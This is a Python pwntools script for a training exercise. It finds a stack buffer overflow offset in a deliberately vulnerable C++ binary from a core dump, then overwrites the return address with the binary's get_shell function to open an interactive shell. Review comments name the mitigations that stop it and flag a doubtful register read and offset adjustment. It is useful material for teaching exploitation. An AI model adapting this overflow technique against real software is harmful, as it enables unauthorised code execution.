#! /usr/bin/env python
# https://docs.pwntools.com/en/stable/elf/corefile.html
#
# Training exercise against a deliberately vulnerable C++ binary.
# The script (1) crashes the target with a cyclic pattern and reads the
# overwrite offset back out of the core dump, (2) looks up the address of
# the binary's own `get_shell` function from its symbol table, and
# (3) re-runs the target with that address placed at the offset.
# NOTE(review): the approach presumably assumes the target has no stack
# canary, is loaded at a fixed (non-PIE) address and still carries the
# `get_shell` symbol -- the symbol address is used directly, with no base
# added. Each of those mitigations (canaries, PIE/ASLR, stripping) would
# stop this script; that is the teaching point of the exercise.
from pwn import *
target_name = './vuln_cpp.exe'
# Set up pwntools for the correct architecture
# (context.binary also sets the word size that flat() packs to below)
exe = context.binary = ELF(target_name)
#print(exe.symbols)
# Generate a cyclic pattern so that we can auto-find the offset
# n=8 -> every 8-byte window of the pattern is unique (64-bit pattern)
payload = cyclic(128, n=8)
# Run the process once so that it crashes
# The pattern is handed over as argv[1]; the target is expected to copy it
# into a fixed-size stack buffer without bounds checking.
p = process([target_name, payload])
p.wait() # wait for close
# Get the core dump
# Needs core dumps enabled for the child (e.g. `ulimit -c`); otherwise there
# is nothing for pwntools to load here.
core = p.corefile
# Our cyclic pattern should have been used as the crashing address, make sure!
#assert p32(core.eip) in payload
# Read the 8 bytes at the saved stack pointer and locate them in the pattern.
# NOTE(review): the pattern is 64-bit (n=8) but the register is accessed by
# its 32-bit name `esp` -- confirm this resolves for the target's
# architecture. The trailing "- 4" adjustment is not explained here;
# verify it against the actual binary rather than trusting it.
offset = cyclic_find(core.read(core.esp, 8), n=8) - 4
#print('offset=', offset)
# search for get_shell function address
# in C; func_address = exe.symbols.get_shell
# in C++; parse the symbols dictionary to look for function name in key
# (C++ names are mangled, so the key only *contains* "get_shell"; the first
# matching symbol wins because of the break)
for symbol in exe.symbols.keys():
    if symbol.find("get_shell") >=0:
        func_address = exe.symbols[symbol]
        break
# NOTE: if no symbol matches (e.g. a stripped binary), func_address is never
# bound and the flat() call below fails with NameError.
#print(hex(func_address))
# Second payload: 'A' filler up to `offset`, then the address packed by flat()
payload = flat({
    offset: func_address
}, filler='A')
#print(payload)
io = process([target_name, payload])
# receive and print the payload
print(io.recvline())
# Get a shell!
io.sendline(b'id')
print(io.recvline())
# get interactive shell
io.interactive()